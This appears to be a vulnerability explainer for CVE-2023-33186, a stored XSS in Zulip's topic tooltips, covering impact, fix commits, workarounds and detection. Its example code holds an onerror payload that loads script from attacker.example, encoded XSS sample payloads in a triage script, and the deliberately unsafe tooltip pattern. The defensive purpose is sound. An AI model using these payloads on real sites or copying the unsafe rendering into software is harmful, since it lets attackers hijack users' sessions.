CVE-2023-33186

8.2 HIGH

📋 TL;DR

This cross-site scripting (XSS) vulnerability in Zulip Server lets any user who can send messages inject JavaScript through a crafted topic name. The name is rendered into the tooltip that appears when another user hovers over that topic in the message feed, so the attacker's script runs in the victim's browser with the victim's Zulip session. Only the main development branch between the May 2, 2023 change that introduced the bug and the two fix commits is affected, including the 7.0-beta1 and 7.0-beta2 beta releases; no stable release is affected.

💻 Affected Systems

Products:
  • Zulip Server
Versions: Main development branch checkouts from May 2, 2023 up to (but not including) the fix commits, including beta versions 7.0-beta1 and 7.0-beta2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects development/beta versions; stable releases are not affected. The attacker needs an account that can send a message, and therefore set a topic name, which in most organizations means any member.

📦 What is this software?

Zulip is an open-source team chat application (a Python/Django server with a JavaScript/TypeScript web client) built around topic-based threading: every message in a stream is filed under a short, user-chosen topic name. Because any user who can post can choose that name, topic names are untrusted input to every place the web client renders them, and this vulnerability is one such place.
⚠️ Risk & Real-World Impact

🔴

Worst Case

A user with posting rights gets an organization administrator to hover over the crafted topic. The injected script then runs with the administrator's session and can do whatever the web app can do: read private messages, send messages as the victim, and change user or organization settings. Django's session cookie is HttpOnly by default, so outright cookie theft is less likely than direct misuse of the live session through the same-origin Zulip API.

🟠

Likely Case

Any user with message-sending rights plants the topic; every user who hovers over it in the message feed has their session driven by the attacker's script within that user's own permissions, which is enough to read their private messages, post as them, and change their settings.

🟢

If Mitigated

If topic names are HTML-escaped (or inserted as text rather than markup) before they reach the tooltip, the payload simply shows up as an odd-looking topic name and nothing executes.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation needs an authenticated account that may send messages; the payload is the topic name itself, and the victim only has to hover over that topic in the message feed for the tooltip to be rendered. No public proof of concept is known, but the payload is ordinary HTML injection and is trivial to construct.
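To make the mechanism concrete, the following is an added example written for this page; it is not Zulip's own tooltip code and is not taken from the fix commits. It models a tooltip as the {content, allowHTML} object that libraries such as Tippy.js accept (the template text, the function names and the payload are assumptions made for illustration), shows the vulnerable pattern of interpolating a topic name into markup, and shows two independent fixes: escaping the topic before interpolation, and rendering the tooltip as text rather than HTML. The activeFragments helper is a toy approximation of which markup a browser would execute on insertion.

```javascript
// Added example for this page (not Zulip's tooltip code, not the fix commits): a
// user-chosen topic name interpolated into tooltip markup, and two ways to fix it.
// The {content, allowHTML} shape mirrors what libraries such as Tippy.js accept; the
// template text and function names are assumptions made for illustration.

// Minimal HTML escaping, equivalent in effect to lodash's _.escape.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the raw topic lands inside markup that the tooltip library parses as HTML.
function tooltipUnsafe(topic) {
  return { content: `<strong>Topic:</strong> ${topic}`, allowHTML: true };
}

// FIX A: keep the markup, encode the untrusted part before interpolating it.
function tooltipEscaped(topic) {
  return { content: `<strong>Topic:</strong> ${escapeHtml(topic)}`, allowHTML: true };
}

// FIX B: no markup at all; the library inserts the string as text, never as HTML.
function tooltipText(topic) {
  return { content: `Topic: ${topic}`, allowHTML: false };
}

// Toy stand-in for the browser: when the content is treated as HTML, any tag that
// carries a script or an inline event handler runs as soon as the tooltip is shown.
// Returns the offending tags (an empty list means nothing would execute).
function activeFragments(tooltip) {
  if (!tooltip.allowHTML) return []; // text content is never parsed as markup
  const found = [];
  for (const m of tooltip.content.matchAll(/<[^>]*>/g)) {
    const tag = m[0];
    if (/^<script\b/i.test(tag) || /[\s/]on[a-z]+\s*=/i.test(tag) || /javascript:/i.test(tag)) {
      found.push(tag);
    }
  }
  return found;
}

// Constructed attacker topic. Zulip caps topic names at 60 characters, so realistic
// payloads are short loaders like this one rather than full scripts; it fires on
// insertion and needs no <script> tag. (Django's session cookie is HttpOnly by default,
// so a real payload would drive the same-origin Zulip API as the victim rather than
// read document.cookie.)
const MALICIOUS_TOPIC = "<img src=x onerror=\"import('//attacker.example/p.js')\">";

// Number of executable fragments each rendering strategy would hand to the browser.
function compare(topic) {
  return {
    unsafe: activeFragments(tooltipUnsafe(topic)).length,
    escaped: activeFragments(tooltipEscaped(topic)).length,
    text: activeFragments(tooltipText(topic)).length,
  };
}
```

Either fix on its own is sufficient; the escaped variant is the one to use when the tooltip legitimately mixes markup (a bold label, an icon) with user text. Note that the payload contains no script tag, so a check that only looks for "<script" would miss it.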

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Fixed on the main development branch by commits 03cfb3d9fe61c975d133121ec31a7357f0c9e18f and 3ca131743b00f42bad8edbac4ef92656d954c629; stable releases were never affected

Vendor Advisory: https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph

Restart Required: Yes

Instructions:

1. Upgrade to a current checkout of main (at or after the two fix commits) with the standard git upgrade script, /home/zulip/deployments/current/scripts/upgrade-zulip-from-git main, or move to a stable release, which was never affected.
2. If you must stay on an older development checkout, cherry-pick commits 03cfb3d9fe61c975d133121ec31a7357f0c9e18f and 3ca131743b00f42bad8edbac4ef92656d954c629 and redeploy, so that the web frontend is rebuilt with the fix.
3. Restart the Zulip server (the upgrade script does this for you; a manual cherry-pick needs an explicit restart).

🔧 Temporary Workarounds

Disable topic tooltips

Applies to: all affected checkouts

Remove or neutralise the tooltip rendered for topic names so that a crafted topic is never turned into markup.

This means editing the web frontend and rebuilding it, which is the same effort as deploying the fix commits; it only makes sense if you cannot pull from upstream.

Restrict message sending

Applies to: all affected checkouts

Every user who can send a message can choose a topic name, so restricting who may post shrinks the set of possible attackers.

Use stream posting policies and temporarily deactivate untrusted or guest accounts. This does not protect against a trusted account that is itself compromised.

🧯 If You Can't Patch

  • Serve a Content Security Policy that forbids inline script and inline event handlers; this blocks the obvious payloads but not every variant, and it must be tested against the Zulip web app before you rely on it
  • Review existing topic names for tag-like content (topics are stored in the subject column of the zerver_message table), rename or delete offending topics, and keep checking new topics until the fix is deployed

🔍 How to Verify

Check if Vulnerable:

You are affected if the deployment is a git checkout of main that includes the May 2, 2023 change but not the two fix commits, or if it runs 7.0-beta1 or 7.0-beta2. Stable releases are not affected.

Check Version:

Read ZULIP_VERSION (and, for git deployments, the merge-base) from /home/zulip/deployments/current/version.py, or fetch the unauthenticated /api/v1/server_settings endpoint, whose JSON includes zulip_version and, on recent servers, zulip_merge_base. Server logs are not a reliable place to look for the version.

Verify Fix Applied:

In the deployed checkout, confirm that both commits 03cfb3d9fe61c975d133121ec31a7357f0c9e18f and 3ca131743b00f42bad8edbac4ef92656d954c629 are ancestors of HEAD (for example with git merge-base --is-ancestor), and confirm that the running deployment was actually rebuilt from that checkout rather than only having its working tree updated.

📡 Detection & Monitoring

Log Indicators:

  • Topic names containing tag-like content ("<script", "<img", "<svg", inline "on...=" handlers, "javascript:") or percent- or entity-encoded versions of them; topics live in the database (zerver_message.subject), not in server logs, so query the database or an export rather than grepping logs
  • There is no server-side record of a successful trigger: tooltip rendering happens entirely in the browser, so the creation of the malicious topic is the only server-side event to look for

Network Indicators:

  • Browsers of users who viewed the message feed making requests to domains the organization does not normally contact, in particular script loads or beacons right after message-feed activity
  • API calls in a user's web session that the user did not initiate (messages sent, settings changed) shortly after the suspicious topic was posted

SIEM Query:

Query the message table rather than the logs: select id, sender_id and subject from zerver_message where subject contains "<script", an inline "on...=" handler, "javascript:", or their percent- and entity-encoded forms, and group the results by sender to find the account that created the topics.
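The query above is easier to get right once the matching logic is written down. The following is an added triage script for this page, not a Zulip tool and not part of the advisory: it takes rows shaped like the id, sender and subject columns you would export from zerver_message (the rows here are constructed, with the sender shown as an email for readability), undoes percent-encoding and HTML entities so encoded payloads do not slip past, and flags topics whose content looks like executable markup while leaving ordinary uses of "<" alone.

```javascript
// Added example for this page (not a Zulip tool): flag topic names that look like
// executable markup. Input rows mimic an export of zerver_message (id, sender, subject);
// the rows below are constructed, and "sender" is shown as an email for readability.

// Undo the encodings an attacker might use to get past a naive search for "<script".
function normalizeTopic(topic) {
  let s = String(topic);
  // Percent-encoding, applied repeatedly to catch double encoding; a stray "%" that
  // is not valid encoding (e.g. "100% done") throws, and the string is kept as-is.
  for (let i = 0; i < 3; i++) {
    try {
      const decoded = decodeURIComponent(s);
      if (decoded === s) break;
      s = decoded;
    } catch (_err) {
      break;
    }
  }
  // Numeric entities plus the few named ones that matter for markup.
  s = s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&(?:#39|apos);/gi, "'");
  // Drop NULs, collapse whitespace and lower-case, so spacing and case tricks still match.
  return s.replace(/\0/g, "").replace(/\s+/g, " ").toLowerCase();
}

// Patterns are matched against the normalised (lower-cased) topic. A bare "<" is not
// enough on its own: "a < b" is a legitimate topic, "<svg/onload=...>" is not.
const PATTERNS = [
  { name: "script-tag", re: /<\s*script\b/ },
  { name: "event-handler", re: /<[^>]*[\s/]on[a-z]+\s*=/ },
  { name: "javascript-uri", re: /java\s*script\s*:/ },
  { name: "active-element", re: /<\s*(?:iframe|object|embed|svg|img|math|link|meta|style)\b/ },
];

// One finding per suspicious row: the original topic, its normalised form (so the
// reviewer sees what an encoded payload actually decodes to) and the pattern names hit.
function scanTopics(rows) {
  const findings = [];
  for (const row of rows) {
    const normalized = normalizeTopic(row.subject);
    const hits = PATTERNS.filter((p) => p.re.test(normalized)).map((p) => p.name);
    if (hits.length > 0) {
      findings.push({ id: row.id, sender: row.sender, subject: row.subject, normalized, hits });
    }
  }
  return findings;
}

// Group findings by sender so the account that planted the topics stands out.
function findingsBySender(rows) {
  const counts = {};
  for (const f of scanTopics(rows)) counts[f.sender] = (counts[f.sender] || 0) + 1;
  return counts;
}

// Constructed sample rows: benign topics, including ones containing "<" or "%", plus
// three payloads in plain, percent-encoded and entity-encoded form.
const SAMPLE_ROWS = [
  { id: 101, sender: "alice@example.com", subject: "Q2 planning" },
  { id: 102, sender: "bob@example.com", subject: "is 3 < 5 and a < b?" },
  { id: 103, sender: "mallory@example.com", subject: '<img src=x onerror="alert(1)">' },
  { id: 104, sender: "mallory@example.com", subject: "%3Cscript%3Eimport('//a.example/p.js')%3C/script%3E" },
  { id: 105, sender: "mallory@example.com", subject: "&lt;svg/onload=alert(1)&gt;" },
  { id: 106, sender: "carol@example.com", subject: "Deploy <v7.0-beta2> notes" },
  { id: 107, sender: "dave@example.com", subject: "100% done" },
];
```

Treat the output as a triage list, not a verdict: rows 102, 106 and 107 stay clean while the three encoded and plain payloads from the same sender are flagged, which is the pattern worth escalating. The same normalisation should be applied to any SIEM rule, since a rule that only matches the literal string "<script" misses both the entity-encoded and the handler-based variants.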

🔗 References

  • GitHub security advisory: https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-33186
  • Fix commits: https://github.com/zulip/zulip/commit/03cfb3d9fe61c975d133121ec31a7357f0c9e18f and https://github.com/zulip/zulip/commit/3ca131743b00f42bad8edbac4ef92656d954c629
